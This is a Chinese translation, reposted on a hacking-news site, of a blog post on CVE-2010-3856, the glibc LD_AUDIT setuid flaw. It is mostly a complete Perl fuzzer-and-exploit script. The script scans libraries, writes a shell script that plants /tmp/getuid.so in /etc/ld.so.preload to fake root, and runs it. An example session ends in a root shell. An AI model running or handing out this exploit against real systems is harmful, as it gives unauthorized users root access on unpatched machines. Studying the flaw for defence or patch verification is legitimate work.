记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

[译]对CVE-2010-3856的模糊测试和利用

2014-06-12 00:40

Tavis Ormandy 在2010年末发现的漏洞 “GUN C动态链接库在设置uid时会任意打开DSOs”,使得大多数用户慌忙的为他们的系统打上补丁。

一个非特权用户可以通过文件descripto实现硬编码并运行一个SUID程序,从而欺骗$ORIGIN,然后使用id.so里的LD_AUDIT模式以最高权限执行任意代码。

官方对该漏洞的描述只包括几个潜在的不安全库:

Liblftp-task.so.0 和 libpcprofile.so

不过实际上,不安全库肯定不止这么几个,即使你的系统中不包含库,但也不意味着你的系统中就不存在漏洞。

这里说一下公开的利用方式:即创建一个后门文件,并通过corn使用最高权限运行它,不过这种方法并不具有普遍性。

经过一些研究,我们写了一个模糊测试工具来测试系统,如果有Tavis Ormandy测试的漏洞库的话,就可以直接进行系统破坏。

此外,我们还专门加入一个Exp用于检测利用的结果。该Exp通过欺骗/etc/id-so/ 来获取权限,这可以使攻击者尽快的取得最高权限,对于进行渗透测试是非常重要的,Exp如下:

#!/usr/bin/perl
use POSIX;
$ptxt="

[The GNU C library dynamic linker will dlopen arbitrary DSOs
during setuid loads]
[desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu]

";
print $ptxt;
our $old_fh=select(STDOUT); $|=1; select($old_fh);
# you can add your own paths to lib folder here
@libdirs=("/lib");
$tempdir="/tmp/fuzz/"; # temp directory
mkdir($tempdir);

#make some ascii
$total=0;
foreach $libdir (@libdirs) {
opendir(my $dir, $libdir);
@lf = readdir($dir);
closedir $dir;
$total=$total+scalar(@lf)-2;
}
$step=ceil($total/50);
$stepp=0;
print "0%"." "x6 ."20%"." "x6 ."40%"." "x6 ."60%".
" "x6 ."80%"." "x6 ."100%\n";
print "\[";
foreach $libdir (@libdirs) {
opendir(my $dir, $libdir);
@libfiles = readdir($dir);
closedir $dir;
foreach $libfile (@libfiles) {
$stepp++;
if ($stepp==$step) {print ".";$stepp=0;}
if (($libfile ne ".") && ($libfile ne "..")) {
@dump=`strings $libdir\/$libfile`;
foreach $dline (@dump) {
if ($dline=~/^([A-Z\_0-9]+)$/) {
chomp($dline);
$ccc=`LD_AUDIT="$libfile" $dline="$tempdir
$libfile-$dline" ping&>/dev/null`;
}
}
}
}

}
print "\]\n";

print "Fuzzing done. Thank you for using!\n";

opendir(my $dir, $tempdir);
@fuzzList = readdir($dir);
closedir $dir;
$libToExploit="";$argToExploit="";
if (scalar(@fuzzList)>2) {
foreach $fuzzFile (@fuzzList) {
if ($fuzzFile ne "." && $fuzzFile ne "..") {
my ($lib,$param)=$fuzzFile=~/(.*)-(.*)/;
print "Success: vuln lib - $lib ; arg - $param\n";
if ((-e "$tempdir$fuzzFile") && (!-d "$tempdir$fuzzFile")) {
$libToExploit=$lib;
$argToExploit=$param;
}
}
}
} else {
print "Fail. No vuln libs found. Try another target ;)\n";
exit();
}

$shCode=qq(#!/bin/sh
umask 0
LD_AUDIT=EXP_LIBRARY EXP_ARGUMENT=/etc/ld.so.preload ping
echo "[+] creating /tmp/getuid.so"
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -shared /tmp/getuid.c -o /tmp/getuid.so
echo "/tmp/getuid.so" > /etc/ld.so.preload
);

if ($libToExploit ne "" && $argToExploit ne "") {
$shCode=~s/EXP_LIBRARY/$libToExploit/gi;
$shCode=~s/EXP_ARGUMENT/$argToExploit/gi;
open(SH,">spl.sh");
print SH $shCode;
close(SH);
chmod(0755,"spl.sh");
system("./spl.sh");
print "Hehe.. Type 'su' and be awesome!\n";
}


Example of usage:

dummy@bt:~$ perl spl.pl


[The GNU C library dynamic linker will dlopen arbitrary
DSOs during setuid loads]
[desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu]

0% 20% 40% 60% 80% 100%
[......................................]
Fuzzing done. Thank you for using!
Success: vuln lib - libpcprofile.so ; arg - PCPROFILE_OUTPUT
Success: vuln lib - libmemusage.so ; arg - MEMUSAGE_OUTPUT

Memory usage summary: heap total: 0, heap peak: 0, stack peak: 0
total calls total memory failed calls
malloc| 0 0 0
realloc| 0 0 0
(nomove:0, dec:0, free:0)
calloc| 0 0 0
free| 0 0
Histogram for block sizes:
ERROR: ld.so: object 'libmemusage.so' cannot be loaded as
audit interface: undefined symbol: la_version; ignored.
Usage:
ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[+] creating /tmp/getuid.so
Hehe.. Type 'su' and be awesome!
dummy@bt:~$ id
uid=0(root) gid=1001(dummy) euid=1001(dummy) groups=1001(dummy)
dummy@bt:~$ su
root@bt:/home/dummy# exit

via@ptsec

原文地址:http://blog.ptsecurity.com/2011/04/fuzzing-and-exploitation-of.html

文中若未特别声明转载请注明来自:91ri.org
知识来源: www.91ri.org/9349.html

阅读:120534 | 评论:0 | 标签:漏洞研究 漏洞利用

想收藏或者和大家分享这篇好文章→复制链接地址

“[译]对CVE-2010-3856的模糊测试和利用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云